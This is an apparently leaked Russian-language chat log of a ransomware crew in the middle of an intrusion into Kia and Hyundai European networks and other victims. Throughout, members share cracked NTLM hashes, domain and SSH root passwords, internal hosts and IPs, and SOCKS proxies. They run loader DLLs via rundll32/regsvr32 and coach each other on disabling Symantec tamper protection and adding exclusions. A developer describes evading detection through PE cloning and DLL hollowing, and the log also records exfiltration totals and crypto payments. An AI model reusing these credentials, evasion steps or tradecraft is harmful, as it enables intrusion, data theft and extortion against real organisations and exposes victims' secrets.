[2023-12-23 10:03:43] @usernamegg:matrix.bestflowers247.online: jj скинь креды от линукса рабочего
--------------------
[2023-12-23 10:03:45] @usernamegg:matrix.bestflowers247.online: срочно
--------------------
[2023-12-23 10:03:54] @cob_crypt_ward:matrix.bestflowers247.online: c32_dll.dll
--------------------
[2023-12-23 10:04:05] @cob_crypt_ward:matrix.bestflowers247.online: попробуй пожалуйста
--------------------
[2023-12-23 10:04:44] @cob_crypt_ward:matrix.bestflowers247.online: rundll32 c_32_dll.dll,DllRegisterServer
--------------------
[2023-12-23 10:04:52] @cob_crypt_ward:matrix.bestflowers247.online: regsvr32 c_32_dll.dll
--------------------
[2023-12-23 10:05:59] @usernamehunter:matrix.bestflowers247.online: 03c663ca4aa39659fd5eef2655bfffce:SafeIndia@2024

--------------------
[2023-12-23 10:11:04] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2023-12-23 в 13.10.51.png
--------------------
[2023-12-23 10:11:30] @cob_crypt_ward:matrix.bestflowers247.online: счас, 5 мин
--------------------
[2023-12-23 10:16:13] @cob_crypt_ward:matrix.bestflowers247.online: c32_2.dll
--------------------
[2023-12-23 10:16:32] @usernamegg:matrix.bestflowers247.online: ?????
--------------------
[2023-12-23 10:16:38] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-12-23 10:16:44] @usernamess:matrix.bestflowers247.online: d5731a0c17e3cce33cd1b003a8d77b61
--------------------
[2023-12-23 10:17:06] @usernameyy:matrix.bestflowers247.online: ```
84JskFBoUddXz1bUn329NeSLw7rfxZkbJiQN7eJdtkDvZDHTPMvHEJkDGNaW47sQfC9jaQ4EDFkgxGJxof4uEgonCdY2HnK
--------------------
[2023-12-23 10:17:08] @usernameyy:matrix.bestflowers247.online: xmr 1050$
--------------------
[2023-12-23 10:17:19] @usernameyy:matrix.bestflowers247.online: * xmr 1500$
--------------------
[2023-12-23 10:17:33] @usernameyy:matrix.bestflowers247.online: это новый сервер на  2 месяца 30 тб, + 2 месяца сторейдж 9_1
--------------------
[2023-12-23 10:20:43] @usernamegg:matrix.bestflowers247.online: не до этого пока братец
--------------------
[2023-12-23 10:20:44] @cob_crypt_ward:matrix.bestflowers247.online: заработало?
--------------------
[2023-12-23 10:23:58] @usernamegg:matrix.bestflowers247.online: делаю
--------------------
[2023-12-23 10:25:55] @usernamess:matrix.bestflowers247.online: ```
KIA.EUCORP.LOCAL\KIBA1105 98dd5182757e12c5926be419fa72468e
KIA.EUCORP.LOCAL\KEUSLDSK d6a9ff08520de6d1d2b8f06eac35b1c1
KIA.EUCORP.LOCAL\KEUSAZURE01 1b5ec14901df769a4929857f29050044
KIA.EUCORP.LOCAL\KEUA0033 1e9249f2f65023825245df7d740689b9
KIA.EUCORP.LOCAL\KEUA0032 a4e8defa5809671c6d873f210056ac5f
KIA.EUCORP.LOCAL\KEUA0031 5fe529035fc4babfca814ebb9659a412
```

--------------------
[2023-12-23 10:27:11] @usernameboy:matrix.bestflowers247.online: a4e8defa5809671c6d873f210056ac5f:Victuuri2016!

--------------------
[2023-12-23 10:31:52] @usernamegg:matrix.bestflowers247.online: заработало
--------------------
[2023-12-23 10:31:53] @usernamegg:matrix.bestflowers247.online: прилетело
--------------------
[2023-12-23 10:31:57] @usernamegg:matrix.bestflowers247.online: отличный фаил
--------------------
[2023-12-23 10:31:57] @cob_crypt_ward:matrix.bestflowers247.online: понятно
--------------------
[2023-12-23 10:31:59] @usernamegg:matrix.bestflowers247.online: спасибо
--------------------
[2023-12-23 10:32:01] @cob_crypt_ward:matrix.bestflowers247.online: короче дело в боку
--------------------
[2023-12-23 10:32:06] @cob_crypt_ward:matrix.bestflowers247.online: я сейчас без него сделал
--------------------
[2023-12-23 10:32:11] @cob_crypt_ward:matrix.bestflowers247.online: боку на старых тачках не работает
--------------------
[2023-12-23 10:32:22] @cob_crypt_ward:matrix.bestflowers247.online: прости за такие моменты
--------------------
[2023-12-23 10:33:10] @cob_crypt_ward:matrix.bestflowers247.online: > <@cob_crypt_ward:matrix.bestflowers247.online> кто билды делает, используйте теперь пожалуйста boku, а не elusive

на старых машинах не работает, делайте только для вин 10+ с ним, для остальных случаев elusive
--------------------
[2023-12-23 10:33:31] @cob_crypt_ward:matrix.bestflowers247.online: на нг перепишу его снова, будет везде работать
--------------------
[2023-12-23 10:33:36] @cob_crypt_ward:matrix.bestflowers247.online: написал ребятам
--------------------
[2023-12-23 10:40:08] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-12-23 10:50:29] @usernamett:matrix.bestflowers247.online: `SHMST001.hyundai.EUCORP.LOCAL 10.123.77.100 Windows Server 2008 R2 Standard`


--------------------
[2023-12-23 10:51:37] @usernamegg:matrix.bestflowers247.online: http://temp.sh/yjAfV/c32_dll.dll
--------------------
[2023-12-23 10:53:22] @usernamett:matrix.bestflowers247.online: ```
10.115.193.77
10.115.193.150
10.115.192.139
10.115.193.135
10.115.193.137
10.115.192.137
10.115.192.138
10.115.193.242
10.115.193.195
10.122.21.80
10.137.210.132
10.115.193.201
10.115.193.134
10.115.192.136
10.123.106.132
10.123.106.144
10.123.106.140
10.123.106.154
10.123.106.156
10.123.106.149
10.123.106.158
10.123.106.147
10.123.106.195
10.123.106.137
10.123.106.159
```
--------------------
[2023-12-23 11:06:16] @usernamett:matrix.bestflowers247.online: ```
HYUNDAI

51.222.194.213:33643
```

--------------------
[2023-12-23 11:07:05] @usernamett:matrix.bestflowers247.online: * ```
HYUNDAI

51.222.194.213:33643
51.222.194.213:33389
```
--------------------
[2023-12-23 11:09:49] @usernamegg:matrix.bestflowers247.online: 10.137.210.132
10.115.193.201
10.115.193.134
10.115.192.136
10.123.106.132
10.123.106.144
10.123.106.140
10.123.106.154
10.123.106.156
10.123.106.149
10.123.106.158
10.123.106.147
--------------------
[2023-12-23 11:12:55] @usernamett:matrix.bestflowers247.online: ```
HYUNDAI

51.222.194.213:36637
51.222.194.213:44919
```
--------------------
[2023-12-23 11:15:53] @usernameww:matrix.bestflowers247.online: ```
KIA
51.222.194.213:40087
51.222.194.213:45005
```
--------------------
[2023-12-23 11:18:35] @usernameww:matrix.bestflowers247.online: ```
HYUNDAI FIZ SOCKS


51.222.194.213:37627
51.222.194.213:41381
```
--------------------
[2023-12-23 11:31:09] @usernameww:matrix.bestflowers247.online: ```
KIA FIZ SOCKS
51.222.194.213:45279
51.222.194.213:34825
```
--------------------
[2023-12-23 11:32:03] @usernamett:matrix.bestflowers247.online: `SKSWD002.KIA.EUCORP.LOCAL`
--------------------
[2023-12-23 11:32:17] @usernamett:matrix.bestflowers247.online: 10.122.165.106
--------------------
[2023-12-23 11:33:58] @usernamett:matrix.bestflowers247.online: 10.122.147.33
--------------------
[2023-12-23 11:34:11] @usernamett:matrix.bestflowers247.online: 10.122.147.30
--------------------
[2023-12-23 11:34:28] @usernamett:matrix.bestflowers247.online: 10.122.147.32
--------------------
[2023-12-23 11:34:57] @usernamett:matrix.bestflowers247.online: 10.122.147.34
--------------------
[2023-12-23 11:35:08] @usernamett:matrix.bestflowers247.online: 10.122.147.31
--------------------
[2023-12-23 11:37:38] @usernamett:matrix.bestflowers247.online: `SKSWD002.KIA.EUCORP.LOCAL 10.122.167.45 Windows Server 2016 Standard`


--------------------
[2023-12-23 11:37:57] @usernamett:matrix.bestflowers247.online: `SKNLA070.KIA.EUCORP.LOCAL 10.122.165.106 Windows Server 2022 Standard`


--------------------
[2023-12-23 11:38:17] @usernamett:matrix.bestflowers247.online: `SKEUD002.KIA.EUCORP.LOCAL 10.122.69.140 Windows Server 2016 Standard`


--------------------
[2023-12-23 11:43:54] @usernamett:matrix.bestflowers247.online: ```
DEKFPPT02.KIA.EUCORP.LOCAL 10.122.24.156 Windows Server 2019 Standard

SKSWA006.KIA.EUCORP.LOCAL 10.122.167.8 Windows Server 2019 Standard

SKIAM001.KIA.EUCORP.LOCAL 10.122.21.17 Windows Server 2019 Standard
```


--------------------
[2023-12-23 11:52:23] @usernamegg:matrix.bestflowers247.online: 10.122.165.106
10.122.147.33
10.122.147.30
10.122.147.32
10.122.147.34
10.122.147.31
--------------------
[2023-12-23 11:54:15] @usernamett:matrix.bestflowers247.online: ```
SKNLA070.KIA.EUCORP.LOCAL 10.122.165.106 Windows Server 2022 Standard
SKSWD002.KIA.EUCORP.LOCAL 10.122.167.45 Windows Server 2016 Standard
```

--------------------
[2023-12-23 11:55:09] @usernamett:matrix.bestflowers247.online: ```
SKNLA070.KIA.EUCORP.LOCAL 10.122.165.106 Windows Server 2022 Standard
SKEUD002.KIA.EUCORP.LOCAL 10.122.69.140 Windows Server 2016 Standard
```
--------------------
[2023-12-23 12:19:43] @usernamett:matrix.bestflowers247.online: 
```
51.222.194.213:45279
51.222.194.213:44919
51.222.194.213:33389
51.222.194.213:34825
51.222.194.213:40087
51.222.194.213:37627
51.222.194.213:36637
51.222.194.213:33643
```
--------------------
[2023-12-23 12:24:08] @usernamess:matrix.bestflowers247.online: `HYUNDAI\HAEA0330 DrPepper11!!`
--------------------
[2023-12-23 12:28:35] @usernamess:matrix.bestflowers247.online: Using domain name: HYUNDAI.EUCORP.LOCAL
Using dc name: SHYUD005
Using password: PAss_w0rd!_Str0nG!
--------------------
[2023-12-23 12:36:49] @usernamegg:matrix.bestflowers247.online: еще соксы есть ?
--------------------
[2023-12-23 12:47:42] @usernamejj:matrix.bestflowers247.online: proxychains ssh root@104.131.168.117
--------------------
[2023-12-23 12:48:24] @usernamegg:matrix.bestflowers247.online: eже неактуально
--------------------
[2023-12-23 12:48:39] @usernamejj:matrix.bestflowers247.online: выезжали ненадолго
--------------------
[2023-12-23 12:48:56] @usernamegg:matrix.bestflowers247.online: * уже неактуально
--------------------
[2023-12-23 12:49:12] @usernamegg:matrix.bestflowers247.online: айпишнеКЕ
--------------------
[2023-12-23 12:53:41] @usernamess:matrix.bestflowers247.online: ```
Using domain name: KIA.EUCORP.LOCAL
Using dc name: skitd003.KIA.EUCORP.LOCAL
Using password: PAss_w0rd!_Str0nG!
```

--------------------
[2023-12-23 12:57:43] @usernamenn:matrix.bestflowers247.online: `https://filebin.net/pgvhr65fo3lznxyo/40.xls`
--------------------
[2023-12-23 12:59:51] @usernamenn:matrix.bestflowers247.online: 10.122.174.38:3388
--------------------
[2023-12-23 13:05:41] @usernamexx:matrix.bestflowers247.online: бро с ориентируешь когда тебя ждать?
--------------------
[2023-12-23 13:09:19] @usernamenn:matrix.bestflowers247.online: 10.122.21.123:3388
--------------------
[2023-12-23 13:15:05] @usernamecc:matrix.bestflowers247.online: SHMST013
--------------------
[2023-12-23 13:15:08] @usernamecc:matrix.bestflowers247.online: SHMSL001
--------------------
[2023-12-23 13:15:12] @usernamecc:matrix.bestflowers247.online: SHTCA095
--------------------
[2023-12-23 13:15:18] @usernamegg:matrix.bestflowers247.online: вечером
--------------------
[2023-12-23 13:25:24] @usernameww:matrix.bestflowers247.online: `HYUNDAI\haea0001 PAss_w0rd!_Str0nG!`
--------------------
[2023-12-23 13:26:35] @usernamett:matrix.bestflowers247.online: ```
10.122.21.11
10.122.68.20
10.122.21.46
10.122.21.12
10.122.21.13
10.122.21.225
10.122.21.224
EUCORP.LOCAL
```
--------------------
[2023-12-23 13:30:34] @usernameww:matrix.bestflowers247.online: `HYUNDAI\HAESSAPI PAss_w0rd!_Str0nG!`
--------------------
[2023-12-23 13:34:28] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2023-12-23 в 16.34.03.png
--------------------
[2023-12-23 13:46:56] @cameron777:matrix.org: tam eti 2 tolko
i tot chto logoff zdelal
--------------------
[2023-12-23 13:48:23] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-12-23 13:48:38] @cameron777:matrix.org: tut oni
--------------------
[2023-12-23 13:50:09] @usernamexx:matrix.bestflowers247.online: может наберешь как освободишься? пересечемся в городе? мне просто кучу дел нужно сделать перед отьездом, я думал сегодня все сделать, завтра с утра выехать
--------------------
[2023-12-23 13:51:43] @usernamecc:matrix.bestflowers247.online: HYUNDAI_c.exe
--------------------
[2023-12-23 13:51:48] @usernamegg:matrix.bestflowers247.online: я в город не опеду
--------------------
[2023-12-23 13:51:51] @usernamegg:matrix.bestflowers247.online: езжай
--------------------
[2023-12-23 13:51:53] @usernamegg:matrix.bestflowers247.online: на днях увидимся
--------------------
[2023-12-23 13:54:50] @usernamexx:matrix.bestflowers247.online: ладно жду тогда
--------------------
[2023-12-23 13:54:51] @usernamecc:matrix.bestflowers247.online: `C:\Users\Public\HYUNDAI_c.exe C:\windows\_shares.txt C:\windows\HYUNDAI_c.exe`
--------------------
[2023-12-23 13:58:58] @usernamess:matrix.bestflowers247.online: `HYUNDAI\HEUS1009 PAss_w0rd!_Str0nG`
--------------------
[2023-12-23 13:59:06] @usernamess:matrix.bestflowers247.online: * HYUNDAI\HEUS1009 PAss_w0rd!_Str0nG!
--------------------
[2023-12-23 13:59:11] @usernamecc:matrix.bestflowers247.online: `HYUNDAI\HAESSAPI PAss_w0rd!_Str0nG!`
--------------------
[2023-12-23 13:59:27] @usernamegg:matrix.bestflowers247.online: HYUNDAI\HAESSAPI   PAss_w0rd!_Str0nG!
--------------------
[2023-12-23 14:02:14] @usernameww:matrix.bestflowers247.online: `HYUNDAI\HAESSCEP PAss_w0rd!_Str0nG!`
--------------------
[2023-12-23 14:04:33] @usernameww:matrix.bestflowers247.online: HYUNDAIx64_c.exe
--------------------
[2023-12-23 14:10:53] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2023-12-23 в 17.10.38.png
--------------------
[2023-12-23 14:10:56] @usernamegg:matrix.bestflowers247.online: где ты добавлял в исключение фаил ?
--------------------
[2023-12-23 14:11:18] @cameron777:matrix.org: day obshi snimok GUI
--------------------
[2023-12-23 14:11:32] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2023-12-23 в 17.11.26.png
--------------------
[2023-12-23 14:11:43] @cameron777:matrix.org: vot tut vezde
--------------------
[2023-12-23 14:11:44] @usernamegg:matrix.bestflowers247.online: что тут выбрать ?
--------------------
[2023-12-23 14:12:00] @cameron777:matrix.org: C: vibiray
--------------------
[2023-12-23 14:12:05] @cameron777:matrix.org: gde zaxodish
--------------------
[2023-12-23 14:12:19] @usernamegg:matrix.bestflowers247.online: не понял
--------------------
[2023-12-23 14:12:23] @cameron777:matrix.org: esli sam file palit to sam file vibiray v Application Excepntion
DNS exception tozhe delay
--------------------
[2023-12-23 14:12:37] @cameron777:matrix.org: nu C: disk celikov dobav v isklyuchenia
--------------------
[2023-12-23 14:12:43] @cameron777:matrix.org: * nu C: disk celikom dobav v isklyuchenia
--------------------
[2023-12-23 14:12:46] @usernamegg:matrix.bestflowers247.online: +++
--------------------
[2023-12-23 14:13:01] @cameron777:matrix.org: vse 4 mozhesh dobavit'
--------------------
[2023-12-23 14:14:13] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2023-12-23 в 17.14.00.png
--------------------
[2023-12-23 14:14:35] @usernamegg:matrix.bestflowers247.online: все ?
--------------------
[2023-12-23 14:14:40] @usernamegg:matrix.bestflowers247.online: больше ничего не указываю ?
--------------------
[2023-12-23 14:14:45] @cameron777:matrix.org: nu eto pervoe mesto vrode
--------------------
[2023-12-23 14:14:53] @cameron777:matrix.org: dobav v drugie mesta tozhe
--------------------
[2023-12-23 14:15:26] @cameron777:matrix.org: Security Risk, Sonar, DNS , APP< tut uzhe sam file esli palit ili chto to esho
--------------------
[2023-12-23 14:15:39] @cameron777:matrix.org: esh ov nastroykax mozhno otklyuchit' upload faylov itd
--------------------
[2023-12-23 14:16:03] @cameron777:matrix.org: temper Symanteca tozhe mozhno otklyuchit' , potom voobshe virubuti Symantec
--------------------
[2023-12-23 14:16:16] @cameron777:matrix.org: * temper Symanteca tozhe mozhno otklyuchit' , potom voobshe virubit' Symantec
--------------------
[2023-12-23 14:16:42] @cameron777:matrix.org: * Tamper Symanteca tozhe mozhno otklyuchit' , potom voobshe virubit' Symantec
--------------------
[2023-12-23 14:29:22] @usernamess:matrix.bestflowers247.online: `https://www.softlay.com/downloads/symantec-cleanwipe-removal-tool`
--------------------
[2023-12-23 14:33:42] @usernamegg:matrix.bestflowers247.online: https://www.softlay.com/downloads/symantec-cleanwipe-removal-tool
--------------------
[2023-12-23 14:34:15] @usernamegg:matrix.bestflowers247.online: вот его, там два файла должны быть на сервере для удаления exe и db:
CleanWipe.db
CleanWipe.exe
--------------------
[2023-12-23 14:35:45] @cameron777:matrix.org: * esho v nastroykax mozhno otklyuchit' upload faylov itd
--------------------
[2023-12-23 16:06:49] @cob_crypt_ward:matrix.bestflowers247.online: как у вас со вчерашним таргетом?
--------------------
[2023-12-23 16:06:52] @cob_crypt_ward:matrix.bestflowers247.online: вышло все?
--------------------
[2023-12-23 17:09:10] @usernamegg:matrix.bestflowers247.online: http://www.nmcpa.ca
--------------------
[2023-12-23 17:46:58] @u123:matrix.bestflowers247.online: монету закинули 150к, завтра закину, ушел бухгалтер
--------------------
[2023-12-23 17:47:04] @u123:matrix.bestflowers247.online: минимум 100к берем?
--------------------
[2023-12-23 19:29:43] @usernamess:matrix.bestflowers247.online: ???
--------------------
[2023-12-23 19:48:16] @usernamegg:matrix.bestflowers247.online: проснулись ?
--------------------
[2023-12-23 19:48:21] @usernamess:matrix.bestflowers247.online: да
--------------------
[2023-12-23 19:48:23] @usernamess:matrix.bestflowers247.online: ставим
--------------------
[2023-12-23 19:48:24] @usernamezz:matrix.bestflowers247.online: +
--------------------
[2023-12-23 19:48:29] @usernamegg:matrix.bestflowers247.online: супер
--------------------
[2023-12-23 19:48:34] @usernamegg:matrix.bestflowers247.online: NN. спит ?
--------------------
[2023-12-23 19:48:39] @usernamess:matrix.bestflowers247.online: да
--------------------
[2023-12-23 19:48:43] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-12-23 19:48:55] @usernamegg:matrix.bestflowers247.online: минут 35 мне
--------------------
[2023-12-23 19:50:54] @usernamegg:matrix.bestflowers247.online: погоди погоди
--------------------
[2023-12-23 19:51:01] @usernamegg:matrix.bestflowers247.online: у тебя тоже на 5 утра билет ? )
--------------------
[2023-12-23 19:51:06] @usernamegg:matrix.bestflowers247.online: ё$$
--------------------
[2023-12-23 19:51:09] @usernamess:matrix.bestflowers247.online: нет
--------------------
[2023-12-23 19:51:15] @usernamegg:matrix.bestflowers247.online: хорошо
--------------------
[2023-12-23 19:51:16] @usernamess:matrix.bestflowers247.online: я не туда еду
--------------------
[2023-12-23 19:51:36] @usernamegg:matrix.bestflowers247.online: +
--------------------
[2023-12-23 19:51:38] @usernamegg:matrix.bestflowers247.online: +
--------------------
[2023-12-23 19:51:40] @cob_crypt_ward:matrix.bestflowers247.online: tut?
--------------------
[2023-12-23 20:12:18] @usernamegg:matrix.bestflowers247.online: LECLAIR | TARGET GROUP | 298 SERVERS | Hyper-V | 42.1M | cob24, cob8dns | JJ | LeClair Group, United States | www.leclairgroup.com | MS Defender | DW: 1.4TB > ftp7 DONE | ID: ba072dd8-ed4a-4e4d-9291-7dc5e7390c1 | 12.12.23 | Insurance

--------------------
[2023-12-23 20:12:22] @usernamegg:matrix.bestflowers247.online: твои вышли на связь
--------------------
[2023-12-23 20:12:26] @usernamegg:matrix.bestflowers247.online: как поставили их?
--------------------
[2023-12-23 20:17:34] @usernamegg:matrix.bestflowers247.online: так
--------------------
[2023-12-23 20:17:37] @usernamegg:matrix.bestflowers247.online: открой лист
--------------------
[2023-12-23 20:17:42] @usernamejj:matrix.bestflowers247.online: да, вижу
--------------------
[2023-12-23 20:17:44] @usernamegg:matrix.bestflowers247.online: я про в дороги в тот офис
--------------------
[2023-12-23 20:18:01] @usernamegg:matrix.bestflowers247.online: кто они такие вообще
--------------------
[2023-12-23 20:18:04] @usernamegg:matrix.bestflowers247.online: Insurance
--------------------
[2023-12-23 20:18:12] @usernamegg:matrix.bestflowers247.online: реально страховка ?
--------------------
[2023-12-23 20:20:19] @usernamegg:matrix.bestflowers247.online: большая
--------------------
[2023-12-23 20:20:28] @usernamejj:matrix.bestflowers247.online: они занимаются тем, что помогают продавать страховочные прдукты, услуги - страховой маркетинг
--------------------
[2023-12-23 20:20:48] @usernamegg:matrix.bestflowers247.online: сеть большая
--------------------
[2023-12-23 20:20:51] @usernamejj:matrix.bestflowers247.online: XX  с них еще pst качал
--------------------
[2023-12-23 20:20:51] @usernamegg:matrix.bestflowers247.online: по листу
--------------------
[2023-12-23 20:26:38] @usernamess:matrix.bestflowers247.online: 202_443.exe
--------------------
[2023-12-23 20:37:13] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-12-23 20:37:27] @usernamegg:matrix.bestflowers247.online: в рабоет
--------------------
[2023-12-23 20:37:28] @usernamett:matrix.bestflowers247.online: ```
-----------------------------------------
proxychains ssh root@128.140.112.17 = kesslerprod.com
SSH Password: 	sUpXELtA6Hd3cR4R7gsXbd
-----------------------------------------
```
--------------------
[2023-12-23 20:37:36] @usernamegg:matrix.bestflowers247.online: тут ?
--------------------
[2023-12-23 20:37:42] @cob_crypt_ward:matrix.bestflowers247.online: в общем счас сел за апдейт лоадера, начну со статической части, кратко опишу что хочу сделть:
--------------------
[2023-12-23 20:37:42] @usernamegg:matrix.bestflowers247.online: что то соксы поднимаем твоим файлом
--------------------
[2023-12-23 20:37:48] @usernamegg:matrix.bestflowers247.online: а соксы не работаю на сетке
--------------------
[2023-12-23 20:38:06] @usernamess:matrix.bestflowers247.online: 10.131.191.237
--------------------
[2023-12-23 20:38:10] @usernameyy:matrix.bestflowers247.online: exe тоже?
--------------------
[2023-12-23 20:38:54] @usernamegg:matrix.bestflowers247.online: дай мне его
--------------------
[2023-12-23 20:39:00] @usernameyy:matrix.bestflowers247.online: так они его уже запустили
--------------------
[2023-12-23 20:39:02] @usernameyy:matrix.bestflowers247.online: я вижу подписи sws
--------------------
[2023-12-23 20:39:14] @usernamegg:matrix.bestflowers247.online: эта та сетка где ты по пингу качал дату
--------------------
[2023-12-23 20:39:15] @usernamegg:matrix.bestflowers247.online: ))
--------------------
[2023-12-23 20:39:18] @usernamegg:matrix.bestflowers247.online: она с изюминкой
--------------------
[2023-12-23 20:39:19] @usernameyy:matrix.bestflowers247.online: Socks5Cpp.exe
--------------------
[2023-12-23 20:39:26] @usernameyy:matrix.bestflowers247.online: дада, она есть в панеле
--------------------
[2023-12-23 20:39:30] @usernameyy:matrix.bestflowers247.online: ща всё скину с подписями
--------------------
[2023-12-23 20:39:36] @usernamegg:matrix.bestflowers247.online: там сам протокол заблочен ?
--------------------
[2023-12-23 20:39:48] @usernameyy:matrix.bestflowers247.online: неа, там ВСЕ протоколы заблочены
--------------------
[2023-12-23 20:39:50] @usernameyy:matrix.bestflowers247.online: буквально типа
--------------------
[2023-12-23 20:40:03] @usernameyy:matrix.bestflowers247.online: пакет анализируется как то и трафик уходит в блок после первого запроса
--------------------
[2023-12-23 20:40:11] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-12-23 20:40:14] @usernameyy:matrix.bestflowers247.online: пинг прокси еще не делал)))
--------------------
[2023-12-23 20:40:23] @cob_crypt_ward:matrix.bestflowers247.online: сейчас статически я добавляю только ресурсы из какого-то легетимного файла, например из того же вандрайва, то есть сейчас чтоб файл выглядел более легетимно в него добавляются ТОЛЬКО ресурсы, я делаю клонирование всех секций легетимного PE (к примеру, содержимое .bss), и буду ставить им атрибут рид онли, чтоб в рантайме проблем с ними не было. потом я делаю клонирование всех импортов, в таблице IAT будут такие же импорты, как и у оригинального файла
--------------------
[2023-12-23 20:40:24] @usernamegg:matrix.bestflowers247.online: хорошо
--------------------
[2023-12-23 20:40:34] @usernameyy:matrix.bestflowers247.online: > <@usernameyy:matrix.bestflowers247.online> sent a file.

51.89.62.202:443
--------------------
[2023-12-23 20:40:35] @cob_crypt_ward:matrix.bestflowers247.online: возможно еще EAT добавлю, чтоб вообще классно было
--------------------
[2023-12-23 20:40:52] @cob_crypt_ward:matrix.bestflowers247.online: + к всему этому буду раздувать размер файла до оригинального
--------------------
[2023-12-23 20:40:57] @usernamegg:matrix.bestflowers247.online: надо фтп для блога
--------------------
[2023-12-23 20:40:58] @usernamegg:matrix.bestflowers247.online: срочно
--------------------
[2023-12-23 20:41:03] @usernamegg:matrix.bestflowers247.online: что бы они дату залили
--------------------
[2023-12-23 20:41:07] @usernameyy:matrix.bestflowers247.online: не оплачивал утренний счет?
--------------------
[2023-12-23 20:41:20] @usernameyy:matrix.bestflowers247.online: > <@usernameyy:matrix.bestflowers247.online> ```
> 84JskFBoUddXz1bUn329NeSLw7rfxZkbJiQN7eJdtkDvZDHTPMvHEJkDGNaW47sQfC9jaQ4EDFkgxGJxof4uEgonCdY2HnK

это
--------------------
[2023-12-23 20:41:40] @usernameyy:matrix.bestflowers247.online: я заказал там 30 тб
--------------------
[2023-12-23 20:41:58] @usernamegg:matrix.bestflowers247.online: сейчас
--------------------
[2023-12-23 20:42:00] @usernamegg:matrix.bestflowers247.online: оплачиваю
--------------------
[2023-12-23 20:42:08] @cameron777:matrix.org: zdes ya shas skinu
--------------------
[2023-12-23 20:42:14] @cob_crypt_ward:matrix.bestflowers247.online: в принципе, по статическому апдейту все, в динамике я планировал реализовать dll hollowing (перезаписывание секции .text у dll в процессе, чтоб вызывать из нее шеллкод), в принципе это должно еще снизить текущий детект, сейчас я это уже реализовал, но почему-то не заводиться, когда должно работать
--------------------
[2023-12-23 20:42:27] @usernamess:matrix.bestflowers247.online: у тебя есть http&
--------------------
[2023-12-23 20:42:37] @cob_crypt_ward:matrix.bestflowers247.online: думаю вообще за неделю справился бы, но из-за нг не уверен вообще
--------------------
[2023-12-23 20:42:50] @cob_crypt_ward:matrix.bestflowers247.online: но как вы выйдете, должно быть все оч классно
--------------------
[2023-12-23 20:43:07] @usernamegg:matrix.bestflowers247.online: нету столько монеро
--------------------
[2023-12-23 20:43:09] @usernamegg:matrix.bestflowers247.online: надо
--------------------
[2023-12-23 20:43:15] @usernamegg:matrix.bestflowers247.online: usdt
--------------------
[2023-12-23 20:43:18] @usernamegg:matrix.bestflowers247.online: там есть ?
--------------------
[2023-12-23 20:43:22] @usernameyy:matrix.bestflowers247.online: сек
--------------------
[2023-12-23 20:43:35] @cob_crypt_ward:matrix.bestflowers247.online: еще кстати почитал твиттер кодера BRC4 и немного тем на xss.is, говорят что его билды идут с ватермарком от слива, чтоб если слили лицуху в паблик это все быстро задетектилось
--------------------
[2023-12-23 20:43:52] @cob_crypt_ward:matrix.bestflowers247.online: в твиттере кодер писал что каждый апдейт он чистит YARA сигнатуры
--------------------
[2023-12-23 20:44:06] @usernamegg:matrix.bestflowers247.online: братец
--------------------
[2023-12-23 20:44:08] @usernameyy:matrix.bestflowers247.online: ```
BTC Wallet - bc1qfn6vndc6mhlvvtx54ehyq7z6vel8kkctj0e0sa
XMR Wallet - 84JskFBoUddXz1bUn329NeSLw7rfxZkbJiQN7eJdtkDvZDHTPMvHEJkDGNaW47sQfC9jaQ4EDFkgxGJxof4uEgonCdY2HnK
TRC-20 (Tron): (fee + 2,5 %)
TCws332kET8czTuhcBemmmeSrCbTDb2nyD

--------------------
[2023-12-23 20:44:12] @usernamegg:matrix.bestflowers247.online: чут ьпозже на эту тему поговорим
--------------------
[2023-12-23 20:44:15] @cameron777:matrix.org: > <@usernamess:matrix.bestflowers247.online> у тебя есть http&

ne ponyal vorposa
--------------------
[2023-12-23 20:44:18] @cob_crypt_ward:matrix.bestflowers247.online: да, окей
--------------------
[2023-12-23 20:44:19] @usernameyy:matrix.bestflowers247.online: вот такое есть, usdt это вроде ERC-20, а не TRC
--------------------
[2023-12-23 20:44:21] @usernamegg:matrix.bestflowers247.online: я сейчас занят немного
--------------------
[2023-12-23 20:44:22] @cob_crypt_ward:matrix.bestflowers247.online: не отвлекаю, сорян
--------------------
[2023-12-23 20:44:26] @usernamegg:matrix.bestflowers247.online: возможно файлы нужно будет сделать
--------------------
[2023-12-23 20:44:32] @usernamegg:matrix.bestflowers247.online: просто поболтать не могу пока
--------------------
[2023-12-23 20:44:33] @usernamegg:matrix.bestflowers247.online: сорян
--------------------
[2023-12-23 20:44:40] @cob_crypt_ward:matrix.bestflowers247.online: без проблем
--------------------
[2023-12-23 20:44:58] @usernamegg:matrix.bestflowers247.online: монеро оплатим ?
--------------------
[2023-12-23 20:45:04] @usernamess:matrix.bestflowers247.online: не ничего пока)
--------------------
[2023-12-23 20:45:08] @usernamegg:matrix.bestflowers247.online: btc можно же
--------------------
[2023-12-23 20:45:20] @usernameyy:matrix.bestflowers247.online: да
--------------------
[2023-12-23 20:47:13] @usernamegg:matrix.bestflowers247.online: b2c33583b17e278472128add92ed3edec1a2369db1dd457c736ba62f173f2b01
--------------------
[2023-12-23 20:47:21] @usernameyy:matrix.bestflowers247.online: btc пишу да
--------------------
[2023-12-23 20:47:26] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-12-23 20:47:29] @usernamegg:matrix.bestflowers247.online: btc ушло
--------------------
[2023-12-23 20:47:35] @usernamegg:matrix.bestflowers247.online: надо ему сейчас поднять ftp
--------------------
[2023-12-23 20:47:42] @usernamegg:matrix.bestflowers247.online: что бы он поставил заливать сетки
--------------------
[2023-12-23 20:47:49] @usernamegg:matrix.bestflowers247.online: а то потом ебля будет
--------------------
[2023-12-23 20:47:52] @usernameyy:matrix.bestflowers247.online: 1-3 дня доставка, пусть идет на каникулы, я сам всё сделаю
--------------------
[2023-12-23 20:47:58] @usernameyy:matrix.bestflowers247.online: только мне инструкцию пусть напишет
--------------------
[2023-12-23 20:48:06] @usernamegg:matrix.bestflowers247.online: аааа
--------------------
[2023-12-23 20:48:08] @usernamegg:matrix.bestflowers247.online: нет
--------------------
